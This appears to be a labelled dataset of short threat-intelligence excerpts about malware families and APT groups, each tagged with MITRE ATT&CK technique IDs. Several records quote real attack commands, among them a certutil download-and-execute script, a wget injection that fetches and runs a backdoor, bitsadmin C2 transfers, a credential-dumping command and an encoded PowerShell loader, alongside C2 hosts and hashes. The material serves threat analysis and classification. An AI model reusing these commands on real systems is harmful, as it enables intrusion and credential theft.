{"text1":"In December 2018, a thread on HackForums described a change in the ownership and ongoing development of the HawkEye keylogger.Shortly following this exchange, new posts began to appear that were attempting to market and sell new versions of HawkEye (HawkEye Reborn v9), with these new posts also referencing the change in ownership of the project moving forward.HawkEye Reborn v9 is currently marketed as an \"Advance Monitoring Solution.\" It is currently being sold using a licensing model, with purchasers gaining access to the software and updates for different periods based on a tiered pricing model.HawkEye Reborn v9 also features a Terms of Service agreement that provides some additional insight","labels":"['T1543.003', 'T1008']"}
{"text1":"Indicators  File  Hash  Description  x.js  3fefa55daeb167931975c22df3eca20a  HOMEFRY, a 64-bit Windows password dumper\/cracker  mt.exe  40528e368d323db0ac5c3f5e1efe4889  MURKYTOP, a command-line reconnaissance tool\u00a0  com4.js  a68bf5fce22e7f1d6f999b7a580ae477  AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages   Historical Indicators  File  Hash  Description  green.ddd  3eb6f85ac046a96204096ab65bbd3e7e  AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages  BGij  6e843ef4856336fe3ef4ed27a4c792b1  Beacon, a commercially available backdoor  msresamn.ttf  a9e7539c1ebe857bae6efceefaa9dd16  PHOTO, also reported as Derusbi  1024-aa6a121f98330df2edee6c4391df21ff43a33604  bd9e4c82bf12c4e7a58221fc52fed705  BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration","labels":"['T1140']"}
{"text1":"Indicators of compromise MITRE ATT&CK techniques  Modify existing service Code signing File deletion Deobfuscate\/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control  Hashes  fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c  Domains  ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com","labels":"['T1048']"}
{"text1":"Indirect Code Execution Through INF and SCT This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018","labels":"['T1140', 'T1064']"}
{"text1":"In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt: c:\\programdata\\w.exe \u2013w \u2013l \u2013c>>c:\\programdata\\w.txt In a separate incident, the threat actor used access provided by extensive web shell deployment to harvest account credentials:  2016-10-03T09:27:47   dir 2016-10-03T09:28:11   w64.log >ppp.log 2016-10-03T09:30:10     PowerShell.exe -ExecutionPolicy Bypass -File getpwd.ps1 >iistail.log  In another example, BRONZE UNION leveraged the Kekeo credential abuse tool to exploit CVE-2014-6324, a vulnerability in Microsoft's implementation of the Kerberos network authentication protocol","labels":"['T1003', 'T1068']"}
{"text1":"In other cases, threat actors placed web shells on externally accessible servers, sometimes behind a reverse proxy, to execute commands on the compromised system","labels":"['T1090', 'T1059', 'T1505.003']"}
{"text1":"In particular, the threat actors have exploited CVE-2011-3544, a vulnerability in the Java Runtime Environment, to deliver the HttpBrowser backdoor; and CVE-2010-0738, a vulnerability in JBoss, to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code","labels":"['T1068', 'T1203']"}
{"text1":"Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file: \"C:\\Windows\\system32\\cmd.exe\" \/C systeminfo >> \"C:\\Ahnlab\\$$$A24F.TMP\"  \"C:\\WINDOWS\\system32\\cmd.exe\" \/C tasklist \/v >> \"C:\\Ahnlab\\$$$A24F.TMP\"   NavRAT   Capabilities  NavRAT is a remote access trojan (RAT) designed to upload, download and execute files","labels":"['T1074', 'T1105']"}
{"text1":"In the event this privilege was obtained, the common startup folder is queried by reading the following registry key:  HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup  Alternatively, if the privilege was unable to be obtained, Reaver.v2 will obtain the user\u2019s startup folder by querying the following registry key:  HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup  Reaver proceeds to write a shortcut file to \u2018%TEMP%\\~WUpdate.lnk\u2019","labels":"['T1547.001', 'T1012']"}
{"text1":"In the following example, archives for exfiltration were renamed as .tmp files:  move \\\\{FILE PATH}\\c$\\programdata\\AT.part01.rar  \\\\{FILE PATH}\\c$\\programdata\\at01.tmp The TMP files were then staged for exfiltration on Internet-facing servers that had previously been compromised with the China Chopper web shell","labels":"['T1070.004', 'T1074']"}
{"text1":"In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor","labels":"['T1598.003', 'T1598.002']"}
{"text1":"In this particular instance, the following script is retrieved:@echo off  :if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS)  :32BITOS certutil -urlcache -split -f http:\/\/s8877.1apps[.]com\/vip\/setup.txt > nul certutil -decode -f setup.txt setup.cab > nul del \/f \/q setup.txt > nul GOTO ISEXIST  :64BITOS :certutil -urlcache -split -f http:\/\/s8877.1apps[.]com\/vip\/setup2.txt > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del \/f \/q setup2.txt > nul :GOTO ISEXIST  :ISEXIST  if exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT)  :EXECUTE ver | findstr \/i \"10\\.\" > nul IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS)  :WIN10 expand %TEMP%\\setup.cab -F:* %CD% > nul :if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\\drv.dll EntryPoint) %TEMP%\\install.bat GOTO EXIT  :OTHEROS wusa %TEMP%\\setup.cab \/quiet \/extract:%TEMP% > nul %TEMP%\\install.bat GOTO EXIT  :EXIT del \/f \/q setup.cab > nul del \/f \/q %~dpnx0 > nulThis script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable","labels":"['T1071', 'T1218.011']"}
{"text1":"IOCs Domain supservermgr[.]com URL hxxp:\/\/supservermgr[.]com\/sys\/upd\/pageupd.php Zebrocy d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2 dd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d Koadic abbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca User Agents Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Mozilla\/5.0 (Windows NT 6.1; WOW64) WinHttp\/1.6.3.8 (WinHTTP\/5.1) like Gecko Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko\/20100101 Firefox\/6.0.1 IPs 185.25.51[.]198 185.25.50[.]93 220.158.216[.]127 92.114.92[.]102 86.106.131[.]177  DDE Docs 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff","labels":"['T1087']"}
{"text1":"Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe Injection Technique To Increase Stealthiness After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source","labels":"['T1055.012', 'T1057']"}
{"text1":"It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string","labels":"['T1082', 'T1071']"}
{"text1":"It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language.\u00a0  \u00a0The main module collecting information about the machine","labels":"['T1082', 'T1016', 'T1087']"}
{"text1":"It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell","labels":"['T1113', 'T1083']"}
{"text1":"It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:    ID Thread description   1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility   2 Decrypts command from registry using RC4 with a hardcoded key, and executes it   3 Transfers screenshots from the clipboard to \\Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the \u201csalamati\u201d key (\u201chealth\u201d in Farsi)   4 Transfers screenshots to \\Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies   5 Checks network connection, encrypts and sends gathered logs   6 Unhooks mouse and keyboard, removes bitsadmin task   7 Checks if malware\u2019s working directory size already exceeds its threshold   8 Gathers victim\u00b4s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads    The malware uses the following command to receive data from its C2:       bitsadmin.exe \/TRANSFER HelpCenterDownload \/DOWNLOAD \/PRIORITY normal <server> <file>http:\/\/<server_config>\/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>     Activity logging module (Splitter.exe) This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc","labels":"['T1113', 'T1115']"}
{"text1":"It then creates the following registry key to automatically run the Trojan each time the system starts: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\@RANDOM@ The main behavior carried out by this Trojan involves obtaining an embedded executable, hollowing the current Trojan, writing the new embedded executable to the process memory and calling a specific function in the newly written payload","labels":"['T1055.012', 'T1547.001']"}
{"text1":"It then launches player.exe, a CozyDuke dropper maintaining anti-detection techniques: 3d3363598f87c78826c859077606e514,player.exe,338kb,Trojan.Win32.CozyBear.v,CompiledOn:2014.07.02 21:13:33 Anti-detection and trojan functionality The file collects system information, and then invokes a WMI instance in the root\\securitycenter namespace to identify security products installed on the system, meaning that this code was built for x86 systems, wql here: SELECT * FROM AntiVirusProduct SELECT * FROM FireWallProduct The code hunts for several security products to evade: CRYSTAL KASPERSKY SOPHOS DrWeb AVIRA COMODO Dragon In addition to the WMI\/wql use, it also hunts through the \u201cSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\u201d registry key looking for security products to avoid","labels":"['T1518.001', 'T1036']"}
{"text1":"JAVASCRIPT CODE SNIPPETS:  The first stage JavaScript copies additional JavaScript code snippets in txt format from the RTF document into a random directory \u201cC:\\Users\\<User Name>\\<Random guid>\\\u201d","labels":"['T1033', 'T1064']"}
{"text1":"Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co","labels":"['T1518.001', 'T1124', 'T1497']"}
{"text1":"Lateral Movement, Maintain Presence, and Complete Mission APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc","labels":"['T1021.001', 'T1021']"}
{"text1":"Like the ChinaChopper web shell, the OwaAuth web shell requires a password","labels":"['T1059', 'T1505.003']"}
{"text1":"Malware  Capabilities  WINDSHIELD   Command and control (C2) communications via TCP raw sockets Four configured C2s and six configured ports \u2013 randomly-chosen C2\/port for communications Registry manipulation Get the current module's file name Gather system information including registry values, user name, computer name, and current code page File system interaction including directory creation, file deletion, reading, and writing files Load additional modules and execute code Terminate processes Anti-disassembly   KOMPROGO   Fully-featured backdoor capable of process, file, and registry management Creating a reverse shell File transfers Running WMI queries Retrieving information about the infected system   SOUNDBITE   C2 communications via DNS Process creation File upload Shell command execution File and directory enumeration\/manipulation Window enumeration Registry manipulation System information gathering   PHOREAL   C2 communications via ICMP Reverse shell creation Filesystem manipulation Registry manipulation Process creation File upload   BEACON (Cobalt Strike)   Publicly available payload that can inject and execute arbitrary code into processes Impersonating the security context of users Importing Kerberos tickets Uploading and downloading files Executing shell commands Configured with malleable C2 profiles to blend in with normal network traffic Co-deployment and interoperability with Metasploit framework SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB    Table 3: APT32 Malware and Capabilities APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure","labels":"['T1041']"}
{"text1":"Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications","labels":"['T1553.002', 'T1573']"}
{"text1":"Obfuscation Mechanism for the JScript Code The malicious JScript code obfuscation relies on two main techniques","labels":"['T1140', 'T1027']"}
{"text1":"Office365DCOMCheck.ps1 and SystemDiskClean.ps1):       wscript.exe \"Office365DCOMCheck.vbs\" \\\"PowerShell.exe\u00a0\u00a0-ExecutionPolicy bypass -WindowStyle hidden -NoProfile '<current PowerShell script>'\u00a0\u00a0\\\"     After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex","labels":"['T1036', 'T1012']"}
{"text1":"Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder:       CreateObject(\"WScript.Shell\").Run \"\" & WScript.Arguments(0) & \"\", 0, False     The scheduled task will then run every five minutes, which provides persistent execution of the downloader script","labels":"['T1053.005', 'T1059', 'T1064', 'T1547.001']"}
{"text1":"Old Comnie Variant C2 Decoder      12345678910111213141516171819  import requestsimport sysimport redef decode(data):\u00a0\u00a0o = \"\"\u00a0\u00a0for c in data:\u00a0\u00a0\u00a0\u00a0if c == \"*\":\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += \".\"\u00a0\u00a0\u00a0\u00a0elif c == \"|\":\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += \":\"\u00a0\u00a0\u00a0\u00a0elif c == \"+\":\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += \";\"\u00a0\u00a0\u00a0\u00a0else:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0o += chr(ord(c)-49)\u00a0\u00a0return or = requests.get(sys.argv[1])fd = r.textdata = fd.split(\"++a++\")[1].split(\"++a++\")[0]print(decode(data))     \u00a0 Samples Analyzed eed5945c36ba22a2531dd2d9dd7bc4e17e68544d512be75670919caf287c1b4a 8026442b812469e48ccd11611ab6eacdcb312a8f1aabd563b7f4cb4868315e16 c8951038fd53321661274e5a12532c3fb6f73c75fd75503a1089c56990658fef 48a1ce103e5bf47c47cc5ed40b2dc687ebaf3674d667419287bcb1d0b8d8dda6 e06b797a24fa03a77e0d5f11b0cf0f4f038e0a9ea04d4981d39148969349c79c 7282d0709449abe16457864f58157cac8d007571dc5d463d393d1ae2605d17e0 bf6ee8426245b167a69292e513c0841d818b310dda87daea649221f4e0afd1b3 62b98dde60cb4dd0d0088bde222c5c2c4c92560cccf4753f1ce94e044093ab85 756952652290ad09fe03c8674d44eab2077b091398187c3abcb6f1ddc462c32d 639a49390c6f8597d36ec0bd245efa1b4a078c0506fb515e577a40389b39a614 29ed6eb3c882b018c2bb6bf2f8eb15069dc5510ca119abebf24f09e3c91f10aa 0e8a4e4d5ca501bad25a730fb5de534fa324c6ac23e0a573524693f2d996d105 316a0c6849f183a1a52d0c7648e722c4ca85bd57b0804a147c0c8656b84bbdb9 \u00a0 Identified C2s 121.126.211[.]94:8080 113.196.70[.]11:80,8080 133.130.101[.]47:443 123.51.208[.]157:443;8000;8080 \u00a0 C2 Hosting URLs (DDR URLs) github[.]com\/korlee5643 itsmonsee.tumblr[.]com allworldnewsway.blogspot[.]com","labels":"['T1043']"}
{"text1":"Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine:  Deletes the LNK file from the startup directory","labels":"['T1070.004', 'T1547.009']"}
{"text1":"Once the payload is successfully executed, it will proceed to copy files to the following locations:  C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe C:\\ProgramData\\ManagerApp\\15b937.cab C:\\ProgramData\\ManagerApp\\install.cab C:\\ProgramData\\ManagerApp\\msvcr90.dll C:\\ProgramData\\ManagerApp\\d3d9.dll  The \u201cAdapterTroubleshooter.exe\u201d file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique.\u00a0 The \u201cd3d9.dll\u201d file is malicious and is loaded into memory by the legit binary upon execution.\u00a0 Once loaded, the DLL will then inject FinSpy into the Winlogon process","labels":"['T1055', 'T1574.001', 'T1574.002']"}
{"text1":"One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:    Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India","labels":"['T1598.002', 'T1204']"}
{"text1":"OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0","labels":"['T1027.002', 'T1027']"}
{"text1":"Our analysis of the backdoors used in the September 2018 attacks show that AuditCred.dll\/ROptimizer.dll was similarly used:    \u00a0 FileTokenBroker.dll\u00a0 (2017 attack) AuditCred.dll\/Roptimizer.dll\u00a0 (2018 attack)   Launch Method Service Service   Function Loader Component Loader Component   Working directory %Windows%\\System32 %Windows%\\System32   Loaded Component Path %Windows%\\System32\\en-US %Program Files%\\Common Files\\System\\ado   Loaded Component Blending Blends with .mui files Blend with ActiveX data Object dll files    Table1: Similarities of the Loader components in both incidents Analysis of backdoors used in 2018 The Lazarus group used a series of backdoors in their 2018 attacks, employing a complicated technique that involves three major components:  AuditCred.dll\/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) \u2013 loader DLL that is launched as a service Msadoz<n>.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) \u2013 encrypted backdoor n = number of characters in the loader dll\u2019s filename Auditcred.dll.mui\/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) \u2013 encrypted configuration file   Figure 1: Loading sequence of the modularized backdoor The loader DLL is installed as a service and uses different names (AuditCred and ROptimizer) on different machines","labels":"['T1055', 'T1574.001', 'T1218.011', 'T1574.002']"}
{"text1":"Our observation of related\u00a0actions\u00a0here:    u ps start password stealing (Windows)   Ps_mps\/ps_hwi start start password stealing (Linux, MIPS,\u00a0 ARM)   uper_mps\/uper_hwi start rewrite hook module with a new version and launch it (Linux, MIPS, ARM)   Nm_mps\/nm_hwi start\u00a0 \u2013ban -middle Scan ports and retrieve banners on the router\u00a0subnet\u00a0 (Linux, MIPS,\u00a0 ARM)   U fsget * 7 *.docx, *.pdf, *.doc * search for docs with the given filetypes (Windows)   S sinfo retrieve information on installed programs and launch commands: systeminfo, tasklist, ipconfig, netstat, route print, tracert www.google.com (Windows)   weap_mps\/weap_hwi host188.128.123.52 port[25,26,110,465,995]\u00a0 typetcpconnect DDoS on 188.128.123.52 (Linux, MIPS,\u00a0 ARM)   weap_mps\/weap_hwi\u00a0 typesynflood port80 cnt100000 spdmedium host212.175.109.10 DDoS on 212.175.109.10 (Linux, MIPS,\u00a0 ARM)    The issued commands for the Linux plugins suggest the attackers controlled infected MIPS\/ARM devices.\u00a0We want to pay special attention to the DDoS commands meant for these routers","labels":"['T1003']"}
{"text1":"Part of packed VM PCODE After unpacking, the PCODE it will look like the following: Unpacked PCODE After unpacking the virtual machine PCODE is then decrypted: Decrypted VM PCODE The custom virtual machine supports a total of 34 instructions: Example of parsed PCODE In this example, the \u201c1b\u201d instruction is responsible for executing native code that is specified in parameter field","labels":"['T1140', 'T1027.001', 'T1027.002', 'T1497']"}
{"text1":"Persistence Mechanism Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file","labels":"['T1053.005', 'T1547.001']"}
{"text1":"POSHSPY WMI Component The WMI component of the POSHSPY backdoor leverages a Filter to execute the PowerShell component of the backdoor on a regular basis","labels":"['T1047', 'T1059.001']"}
{"text1":"powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini))));  PowerShell one-liner Encoded text file Execution flow:  The PowerShell code When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it","labels":"['T1036', 'T1059.001']"}
{"text1":"PowerShell Script \u201c58d2a83f777942.26535794.ps1\u201d is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager","labels":"['T1027', 'T1059.001']"}
{"text1":"Previous related research: https:\/\/sec0wn.blogspot.com\/2018\/05\/clearing-muddywater-analysis-of-new.html?m=1 https:\/\/reaqta.com\/2017\/11\/muddywater-apt-targeting-middle-east\/ https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/09\/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity\/ https:\/\/www.sekoia.fr\/blog\/falling-on-muddywater\/  Decoy images by country Jordan     The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc    Turkey     Turkey\u2019s General Directorate of Security Turkey\u2019s Directorate General of Coastal Safety        Turkey\u2019s General Directorate of Security (Onemli Rapor.doc) Turkey\u2019s Ministry of the Interior (Early election.doc)    Saudi Arabia Document signed by the Major General Pilot, commander of the Saudi Royal Air Force     KSA King Saud University (KSU) KSA King Saud University (KSU)    Azerbaijan \u0130nki\u015faf \u00fc\u00e7\u00fcn g\u00f6r\u00fc\u015f.doc (meeting for development) Iraq     Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers    Pakistan     ECP.doc National Assembly of Pakistan.doc        P.Police.doc     Afghanistan President.doc, E-government of Afghanistan Technical details Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware","labels":"['T1071']"}
{"text1":"Probably full and active window screenshot quality   captureActiveQC 40   CaptureSites VPN*0,0 Login*0,0 mail*0,0 Security*0,0 Window titles of interest for screenshots, using left mouse button and Enter keypress hook   important upLog.txt upSCRLog.txt upSpecial.txt upFile.txt upMSLog.txt List of files to send to C2 using bitsadmin.exe from the dedicated thread   maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2   Servers http:\/\/108.61.189.174 Control server HTTP URL   ZipPass KtJvOXulgibfiHk Password for uploaded zip archives   browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread    Most of the parameters are self-explanatory","labels":"['T1071', 'T1041']"}
{"text1":"Procmon shows the malicious module loaded using the regsvr32.exe process.\u00a0\u00a0 Phase two: Payload Analysis\u00a0 \u00a0 The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer","labels":"['T1218.010', 'T1027.002']"}
{"text1":"RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c\/FeedBack.php\u201d","labels":"['T1041', 'T1560']"}
{"text1":"Read a specified file\u2019s contents and send the data to the control server Write data sent by the control server to an existing file Mark a file to be deleted on reboot  Marking a file for deletion on reboot","labels":"['T1070.006', 'T1041']"}
{"text1":"Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication","labels":"['T1071', 'T1049']"}
{"text1":"Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges.\u00a0 The service is configured with a name, description, and display name that is provided within the configuration","labels":"['T1007', 'T1543.003']"}
{"text1":"Registry key \u201cSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\u201d is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer","labels":"['T1090', 'T1012']"}
{"text1":"Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions","labels":"['T1562.001', 'T1083']"}
{"text1":"RIPTIDE\u2019s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication","labels":"['T1573']"}
{"text1":"SA  Generates the following IRC client command that will be sent to the C2 server: PRIVMSG <username> : Hello ,my name is\u00a0 <IRC USER name>, Im ready my Computer Name is:<computer name>  \u00a0 All of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that start with \u201cAS_\u201d or \u201cAF_\u201d","labels":"['T1033', 'T1082']"}
{"text1":"Sample(s) f1b2bc0831445903c0d51b390b1987597009cc0fade009e07d792e8d455f6db0 5cc62ad6baf572dbae925f701526310778f032bb4a54b205bada78b1eb8c479c   DNS tbs1\/tbs2.microsoftonline.services   Domains 0ffice365[.]agency    0ffice365[.]life    0ffice365[.]services    0nedrive[.]agency    corewindows[.]agency    microsoftonline[.]agency    onedrive[.]agency    sharepoint[.]agency    skydrive[.]agency    skydrive[.]services   Sample eb33a96726a34dd60b053d3d1048137dffb1bba68a1ad6f56d33f5d6efb12b97   DNS tvs1\/tvs2.trafficmanager.live   Domains akamaiedge[.]live   \u00a0 akamaized[.]live   \u00a0 akdns[.]live   \u00a0 edgekey[.]live    Table 7: Sample and Domain Associations The third cluster of domains had six different nameservers associated with them, but unlike the other two clusters, were all directly tied to each other","labels":"['T1007', 'T1543.003']"}
{"text1":"Screen capture and audio recording\u00a0 SpyNote RAT was able to take screen captures and, using the device\u2019s microphone, listen to audio conversations","labels":"['T1113', 'T1123']"}
{"text1":"SCT File Analysis The code of the Defender.sct file is an obfuscated JavaScript","labels":"['T1064', 'T1027']"}
{"text1":"SECOND STAGE JAVASCRIPT INTO POWERSHELL: The second stage JavaScript creates a PowerShell file with the same name in the same directory","labels":"['T1064', 'T1547.001', 'T1059.001']"}
{"text1":"Service providers have significant access to customer networks, enabling an attacker who had compromised a service provider to move laterally into the network of the service provider\u2019s customer","labels":"['T1543.003', 'T1021']"}
{"text1":"Serving the backdoor  Another HTTP request is sent to the targeted server, with the following resource: \/?module=wget hxxp:\/\/67[.]209.177.163\/ibus -O \/tmp\/e3ac24a0bcddfacd010a6c10f4a814bc The above standard injection pulls the ibus payload and stores it on \/tmp\/e3ac24a0bcddfacd010a6c10f4a814bc  Launching the backdoor  The execution is issued using an additional HTTP request: \/?module=perl \/tmp\/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf \/tmp\/ e3ac24a0bcddfacd010a6c10f4a814bc That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence","labels":"['T1070.004', 'T1074']"}
{"text1":"Similar to the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 will be injected into that process instead of regsvr32.exe.\u00a0  Irdsnhrxxxfery64 injecting lrdsnhrxxfery98","labels":"['T1055', 'T1218.010']"}
{"text1":"Since Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits.\u00a0The combination of this sustained operational tempo and lack of zero-day exploits may indicate that this group has changed strategy and has decided to attack more frequently and does not have steady access to zero-day exploit code.\u00a0No matter the strategy, this actor has shown an ability to operate successfully","labels":"['T1068', 'T1203']"}
{"text1":"Some of the instances used in this script are: $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x' ($ENV:cOMsPEC[4,26,25]-jOin'')      XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11","labels":"['T1573', 'T1027']"}
{"text1":"Specifies the screen coordinates to take   -zip Name of password (from configuration data) protected zip archive   -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration    Data exfiltration Exfiltration is done through the bitsadmin.exe utility","labels":"['T1113', 'T1115', 'T1560', 'T1132', 'T1486']"}
{"text1":"SpyNote RAT is capable of performing a variety of alarming functions that\u00a0includes:   Activating the device\u2019s microphone and listening to live\u00a0conversations  Executing commands on the\u00a0device  Copying files from the device to a Command & Control (C&C)\u00a0center  Recording screen\u00a0captures  Viewing\u00a0contacts  Reading SMS\u00a0messages  The screenshot below shows part of the sandbox\u2019s report on the SpyNote RAT\u2019s signature and detected\u00a0functions:          Figure 1 :\u00a0Zscaler Cloud Sandbox\u00a0Detection     The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder, which was\u00a0leaked last\u00a0year","labels":"['T1113', 'T1083', 'T1043']"}
{"text1":"Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key","labels":"['T1573', 'T1027']"}
